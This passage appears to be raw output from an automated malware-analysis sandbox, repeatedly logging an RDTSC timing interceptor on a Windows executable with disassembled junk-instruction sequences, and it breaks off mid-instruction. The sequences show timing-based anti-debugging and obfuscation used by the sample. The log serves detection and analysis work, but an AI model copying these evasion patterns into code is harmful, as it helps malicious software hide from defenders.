Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EEB9 second address: 98EECE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB7D50A5ED6h 0x00000008 jo 00007FB7D50A5ED6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EECE second address: 98EED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EED7 second address: 98EEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EEDB second address: 98EEE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EFF6 second address: 98EFFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EFFD second address: 98F01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007FB7D509B851h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98F01B second address: 98F035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB7D50A5EDFh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98F035 second address: 98F039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98F16D second address: 98F177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB7D50A5ED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98F2DE second address: 98F2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB7D509B846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98F2E8 second address: 98F2F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98F2F2 second address: 98F2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993F04 second address: 993F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FB7D50A5EE1h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993F1A second address: 993F21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993F21 second address: 993F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FB7D50A5EE7h 0x0000000f jmp 00007FB7D50A5EE1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993F41 second address: 993F59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B854h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993F59 second address: 993F5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993F5D second address: 993F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99BD23 second address: 99BD38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007FB7D50A5EDCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99BD38 second address: 99BD4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B84Dh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99BD4B second address: 99BD6A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FB7D50A5F06h 0x0000000e jmp 00007FB7D50A5EDDh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99BD6A second address: 99BD70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 999EF8 second address: 999F25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB7D50A5EDFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 999F25 second address: 999F37 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FB7D509B862h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 999F37 second address: 999F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A234 second address: 99A238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A238 second address: 99A23E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A681 second address: 99A689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A689 second address: 99A68F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A68F second address: 99A6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D509B84Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A6A2 second address: 99A6DE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB7D50A5ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FB7D50A5EE4h 0x00000010 jmp 00007FB7D50A5EE2h 0x00000015 pop eax 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e pop eax 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A6DE second address: 99A6E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A881 second address: 99A887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A887 second address: 99A897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FB7D509B84Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 999913 second address: 999937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EDDh 0x00000009 popad 0x0000000a popad 0x0000000b jg 00007FB7D50A5EFDh 0x00000011 push ebx 0x00000012 jp 00007FB7D50A5ED6h 0x00000018 pop ebx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A2DE1 second address: 9A2DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A2DE5 second address: 9A2DEF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB7D50A5ED6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A2DEF second address: 9A2DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 je 00007FB7D509B846h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A2F5C second address: 9A2F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB7D50A5EE8h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB7D50A5EE7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A5A60 second address: 9A5A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B2544 second address: 9B255A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB7D50A5ED6h 0x00000008 jmp 00007FB7D50A5EDCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6DAD second address: 9B6DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6DB1 second address: 9B6DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB7D50A5EE1h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6DCC second address: 9B6DD7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B696C second address: 9B6970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6970 second address: 9B6984 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB7D509B846h 0x00000008 ja 00007FB7D509B846h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6984 second address: 9B6988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6B02 second address: 9B6B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6B08 second address: 9B6B24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FB7D50A5EDCh 0x0000000f jnl 00007FB7D50A5ED6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6B24 second address: 9B6B29 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C0205 second address: 9C022F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jnp 00007FB7D50A5ED6h 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FB7D50A5EE7h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D74EF second address: 8D74F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D74F5 second address: 8D74FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D74FD second address: 8D7504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D7504 second address: 8D7511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FB7D50A5EE2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C0091 second address: 9C009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jbe 00007FB7D509B846h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C009F second address: 9C00A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C00A9 second address: 9C00BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 popad 0x0000000a jo 00007FB7D509B854h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF819 second address: 9CF823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB7D50A5ED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF823 second address: 9CF82D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CE452 second address: 9CE456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CE456 second address: 9CE4B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Fh 0x00000007 jmp 00007FB7D509B858h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 ja 00007FB7D509B846h 0x00000017 jmp 00007FB7D509B84Dh 0x0000001c jmp 00007FB7D509B84Bh 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 jnp 00007FB7D509B846h 0x0000002b pushad 0x0000002c popad 0x0000002d pop edi 0x0000002e push ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CE4B2 second address: 9CE4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CE4B9 second address: 9CE4D3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB7D509B848h 0x00000008 push ebx 0x00000009 jmp 00007FB7D509B84Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CEA75 second address: 9CEA7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB7D50A5ED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3219 second address: 9D321D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D321D second address: 9D323E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FB7D50A5EEFh 0x0000000c jmp 00007FB7D50A5EE3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3392 second address: 9D3397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3397 second address: 9D33AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 js 00007FB7D50A5ED6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FB7D50A5ED6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D731B second address: 9D7325 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7325 second address: 9D732B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D732B second address: 9D735B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FB7D509B856h 0x00000012 jl 00007FB7D509B846h 0x00000018 jnp 00007FB7D509B846h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5520 second address: 9E5526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5526 second address: 9E552B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E552B second address: 9E5533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5533 second address: 9E5537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6CE7 second address: 9E6CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6CF1 second address: 9E6D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FB7D509B854h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FB7D509B84Ch 0x00000012 popad 0x00000013 pushad 0x00000014 jo 00007FB7D509B84Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F48D8 second address: 9F48DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F48DC second address: 9F48E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C9C9 second address: A0C9D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FB7D50A5ED6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C9D8 second address: A0CA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D509B855h 0x00000009 jmp 00007FB7D509B84Eh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 je 00007FB7D509B846h 0x0000001a jmp 00007FB7D509B84Bh 0x0000001f jmp 00007FB7D509B856h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0CBC1 second address: A0CBC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0D5B4 second address: A0D5B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0D88A second address: A0D8A0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jc 00007FB7D50A5ED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jno 00007FB7D50A5ED6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0D8A0 second address: A0D8CD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jno 00007FB7D509B846h 0x0000000f jmp 00007FB7D509B855h 0x00000014 pop esi 0x00000015 jbe 00007FB7D509B84Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A104DB second address: A104E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A104E0 second address: A104E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A105B2 second address: A105B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A105B6 second address: A105BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A105BA second address: A105C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A105C0 second address: A105C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A107B6 second address: A107CD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB7D50A5ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jc 00007FB7D50A5EE0h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1082F second address: A10845 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007FB7D509B846h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A10845 second address: A1084B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1084B second address: A10902 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dx, 53F5h 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FB7D509B848h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b xor dword ptr [ebp+122D248Fh], esi 0x00000031 call 00007FB7D509B849h 0x00000036 pushad 0x00000037 push esi 0x00000038 jp 00007FB7D509B846h 0x0000003e pop esi 0x0000003f pushad 0x00000040 jmp 00007FB7D509B857h 0x00000045 jc 00007FB7D509B846h 0x0000004b popad 0x0000004c popad 0x0000004d push eax 0x0000004e pushad 0x0000004f push ebx 0x00000050 push edx 0x00000051 pop edx 0x00000052 pop ebx 0x00000053 jmp 